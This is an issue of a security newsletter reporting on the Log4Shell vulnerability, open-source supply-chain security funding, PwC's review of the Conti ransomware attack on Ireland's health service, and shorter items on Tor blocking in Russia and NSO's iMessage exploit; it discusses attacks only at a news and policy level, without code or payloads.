Your weekly dose of Seriously Risky Business news is written by Tom Uren, edited by Patrick Gray and supported by the Cyber Initiative at the Hewlett Foundation, AustCyber and founding corporate sponsors CyberCX and Proofpoint.
Log4Shell: Yes, it's That Bad
The vulnerability disclosed in the Java Log4j logging library last week is, to put it mildly, quite bad. It also proves we need to pay more attention to little-known but pervasive software in the open source supply chain.
First, let's talk about the actual vulnerability.
The 'Log4Shell' bug allows an attacker to execute arbitrary code by getting a malicious string logged by a vulnerable Java application. This is very easy to do and Java — and thus Log4j — is everywhere. CISA (with some help from Kevin Beaumont) and the Dutch NCSC are making a list of which applications use Log4j and the range of products affected is huge — see this list of affected products and this list of security advisories.
Logging in all types of software is pervasive and this bug can be triggered simply by placing a malicious string into anything that might be logged. This includes HTTP requests (eg in user agent or x-header fields), usernames, and even iPhone names. Some of the first reports were of Minecraft users invoking the bug by pasting it into a chat. The string can even pass through invulnerable and/or non-Java applications before landing on vulnerable (and perhaps not internet-facing) Java applications. Researchers looking for vulnerable applications have seen it triggered as long as twelve hours after the malicious string was first inserted into an application somewhere else.
The attacks started before a Log4j patch was even released and grew into mass exploitation over the weekend after a PoC was published to GitHub. Cryptomining botnets were some of the first to take advantage (turning stolen computer capacity into cryptocurrency). Since then it has been used by both access brokers and state actors from China, Iran, North Korea and Turkey, and also in a new strain of ransomware. In short, it's being used by all sorts of people to do all sorts of things, and we can expect even more types of attackers to pile in with all sorts of other creative uses.
Despite this, it's still not clear where the overall impact will fall on the range from 'very bad' to 'catastrophic'.
Not all vulnerable products will be patched quickly or even at all. Log4Shell will have a long tail and will be incorporated into red team and ransomware playbooks literally for years to come.
Some large organisations are responding quickly, so it's also possible that a lot of exposure will be patched out relatively quickly. But some products will remain vulnerable for what feels like an eternity. Some of Cisco's vulnerable products, for example, aren't scheduled to be fixed until Christmas Eve. That's an awful exposure window for its customers.
For affected organisations there is no shortage of advice. Vendors need to patch, but given the large number of vulnerable products (see Cisco and VMware's lists for example) this may take a while. In the meantime CISA recommends enumerating vulnerable applications and taking mitigation steps, chasing down all alerts, and using a Web Application Firewall with rules that automatically update to at least filter out some attack traffic. We'd add network-based egress controls that restrict outbound connections to attacker-controlled infrastructure to the list — they're critically important right now.
Even so, these measures will only get you so far. WAFs will only catch the dumbest-of-the-dumb exploitation attempts and you can only chase down alerts if they actually trigger. There are so many different ways to exploit this bug (with different types of malicious strings) that detecting it in your production environment — if the attacker has half a clue — is very hard to do reliably. And even if you've got your egress filtering pinned down, an attacker could still get creative and exfiltrate sensitive environment variables and access keys via DNS requests. (We hear this is happening already. As we said, this is bad.)
All this from a bug in software most people had never heard of until a week ago. CISA Director Jen Easterly highlighted the implications this incident has for understanding the software supply chain:
This effort also underscores the urgency of building software securely from the start and more widespread use of Software Bill of Materials (SBOM), both of which were directed by President Biden in his Executive Order issued in May 2021. A SBOM would provide end users with the transparency they require to know if their products rely on vulnerable software libraries.
Improved transparency makes it easier to respond to these types of supply chain vulnerabilities. But what can be done to remove vulnerabilities from the open source supply chain in the first place?
There are a couple of relatively new initiatives that are trying to help.
One effort underway is the Managed Audit Program (MAP) at the Open Source Technology Improvement Fund (OSTIF). It is trying to identify the most important FOSS projects and fund security improvement work on them. The MAP came up with an initial top 25 projects chosen using various metrics together with advisory council input. And in September Google's Open Source Security Team announced funding for audits of just eight of these top 25 projects.
Interestingly, two logging projects made the cut. The Slf4j Java logging framework is one of the funded projects, and the Google Open Source Security Team's funding announcement cites its wide use, the project's age, and its history of vulnerability reports as reasons for inclusion. Logback-core, yet another Java logging framework is also in the top 25, although so far unfunded.
Other projects that made MAP top 25 list seem pretty deserving though: Git, drupal, Electron, node.js… which highlights how much commonly-used software is open source. Given that Log4j didn't make the list, we wonder about the number of other potentially high-impact vulnerabilities just laying around in low-key, ubiquitous open source projects waiting to be discovered.
A second effort, the Secure Open Source Rewards pilot program, aims to improve security more broadly throughout the FOSS ecosystem. Qualifying projects can earn modest monetary rewards for security improvements and Google is pitching in USD$1m funding.
The fundamental problem here is that some FOSS projects can grow to become extremely important — they really become part of internet infrastructure — but they don't typically receive commensurate levels of security expertise and funding. So what is an 'acceptable' level of risk for a small project becomes unacceptable as a project becomes more important.
Our current default approach is simply to accept that terrible supply-chain vulnerabilities are going to be found and aim to get better at dealing with these incidents. A Software Bill of Materials is just one step towards faster remediation. But, as we explained above, even the companies that do have good insight into their products — like Cisco — will take some time to roll out fixes. The exposure window on this thing is awful.
An entirely reactive response doesn't seem like it's enough. Many companies rely heavily on open source software and make a tonne of money, so more funding for the OSTIF's MAP seems like a no-brainer — let's at least do something about the top 25 projects.
Another approach here might be to actively shape the culture of FOSS to encourage funding for foundational software projects. It does seem ludicrous that sponsorship of Log4j maintainers increased many-fold after Log4Shell was discovered.
This isn't a newly identified risk. Application security specialist Veracode noted in its State of Software Security report that third-party software components are common, and there is a "nesting effect" where third-party components often contain other third-party components. Some recommendations:
...conduct security testing on third-party components prior to integrating into [a] final application. Do not develop a false sense of security and control when developing applications with internal teams given the abundance of third-party code integrated into all software.
And specifically on open source software:
...given the risks associated with using code of unknown security, test outsourced, commercial, and open source suppliers as rigorously as you would test internally developed code for security quality and backdoors.
You can read that report here. Punchline? We quoted the above from the Veracode report published in March 2010.
Ransomware Rot Starts at the Top
A PricewaterhouseCoopers report into the May 2021 ransomware attack on the Irish public health system is an all-too-rare glimpse into the governance failures that contribute to ransomware incidents.
The Health Services Executive (HSE), which provides Ireland's public health services across the country, was hit by the Conti ransomware on 14 May 2021. The initial infection stemmed from a phishing attack on 18 March, after which the attacker moved laterally and escalated privileges over the subsequent eight weeks before deploying the ransomware. The ransomware severely disrupted healthcare services and management reported that 80% of the HSE's IT environment was encrypted by the attackers.
There were several missed opportunities to detect and disrupt the attack in this period. Antivirus software detected the use of Mimikatz and Cobalt Strike on the 'patient zero' workstation and later in another hospital, but didn't quarantine or block execution of the files. The HSE's cyber security provider even emailed the HSE Security Operations team twice about different alerts, but the subsequent actions didn't uncover the ransomware activity.
The PwC report concluded the HSE was woefully unprepared for the risks it faced, despite earlier flagging improving its security as a priority. In 2019, cyber security was listed as a "HIGH" risk on HSE's risk register, with a 75% chance of "MAJOR" impact, yet:
The HSE’s IT-related risks had been presented at Board level on a number of occasions. However, the gravity of cybersecurity exposure was not fully articulated to the Board, given the HSE’s level of vulnerability to a cyber attack, or assessed against a defined risk appetite. Known issues with cybersecurity capability have made limited progress over the course of several years.
In other words, HSE identified cyber security risk as a problem but didn't do enough about it to prevent the attack.
This lack of management attention manifested in many different ways. There was no CISO or any individual responsible for cyber security, no clear delineation between IT and cyber security, and the IT organisation simply didn't have enough people.
This flowed down to the operational level. One third of the HSE's servers were deemed end-of-life as were over 30,000 Windows 7 workstations. There was no effective security monitoring capability across HSE's IT environment coupled with "a lack of effective patching". And HSE's endpoint antivirus solution wasn't deployed everywhere, was only configured to monitor malicious activity (and not block it), and wasn't monitored 24/7. Additionally the antivirus on the patient zero workstation hadn't been updated for over a year.
Conti initially demanded a ransom to decrypt, but within a week it provided the decryption key for free. Even with the key it still took four months to fully recover and HSE's Director-General pegged immediate recovery costs at USD$120m.
Despite this PwC found the attack could have been a lot worse — Conti didn't try to attack medical devices or deliberately destroy data, at least. And, given the lack of preparedness, HSE's response was judged as quite good.
The report's recommendations focus on building IT and cyber security leadership and governance to "provide appropriate focus, attention and oversight". It warns, however, that the transformation will require several years and:
The required investment commitment is likely to be a multiple of the HSE’s current expenditure on technology and operational resilience, but is essential to protect the HSE against future attacks which are inevitable and have the potential to be even more damaging.
This kind of report is great because it does away with the bs "amazingly sophisticated and persistent adversary" narrative. It draws a straight line between leadership and management dysfunction and the multitude of operational shortcomings. But beyond a post-mortem and various specific recommendations, it also clearly spells out the rationale for spending a whole lot more effort and money on improving IT and cyber security governance. It's up to budget-holders to make that difficult decision now.
Three Reasons to be Cheerful this Week:
Windows is basically a collection of dodgy drivers. Now, you can snitch on them: Microsoft has launched a web portal for reporting suspicious or malicious drivers for analysis. An automated scanner will send suspicious drivers for more in-depth analysis — malicious drivers will be blocklisted and vulnerable drivers reported to vendors.
Hack DHS for fun and profit: The US Department of Homeland Security has launched a 'Hack DHS' bug bounty program. Just make sure you stay within the rules of engagement.
Cryptocurrency security improves: Only USD$140m stolen this week!
Paying the Bills
Risky Business has launched something new: product demos that we're publishing to YouTube. This new sponsorship product will help us fund this newsletter and make it sustainable, so if you happen to subscribe to our new product demo page on YouTube we sure would appreciate it. We published two demos last week. The first is with Remediant co-founder Paul Lanzi showing off their network-based (read: "actually deployable") PAM solution. The second is with Ryan Noon of Material Security. They make a product that secures and redacts email at rest, but it has a lot of other features too.
Shorts
Russia to Block Tor
The Russian government is blocking access to Tor. Interestingly Russia has the second largest population of Tor users with 300,000 daily users, or 15% of all Tor users. The Tor project is asking for volunteers to spin up Tor bridges, censorship-resistant on-ramps to the Tor network. We wonder how long before Russia starts blocking them, too.
CISA Advice for Influencers #Blessed
CISA has released guidance on how organisations should manage their social media accounts. Other guides they have cover web browsers, phishing and mobile devices. These guides are aimed at federal government bodies, but look like pretty sensible measures that apply more broadly.
Bad People Doing Cool Stuff For Awful Reasons
Ian Beer & Samuel Groß of Google Project Zero have released a deep dive into NSO's zero-click iMessage exploit. It's described as "one of the most technically sophisticated exploits we've ever seen". It abused the logic in an old fax compression algorithm to define a small computer architecture which was then used to run sandbox escape code. Amazing, although P0's head Tim Willis points out that NSO isn't so exceptional — it's just that they got caught this time. There are plenty of other sharks in the sea, and given recent events we expect to see some more of them in the news soon enough.
Last Edition of 2021
This is the last edition of the year. Thanks very much for your support and have a great end of year holiday season. Seriously Risky Business will be back in the New Year.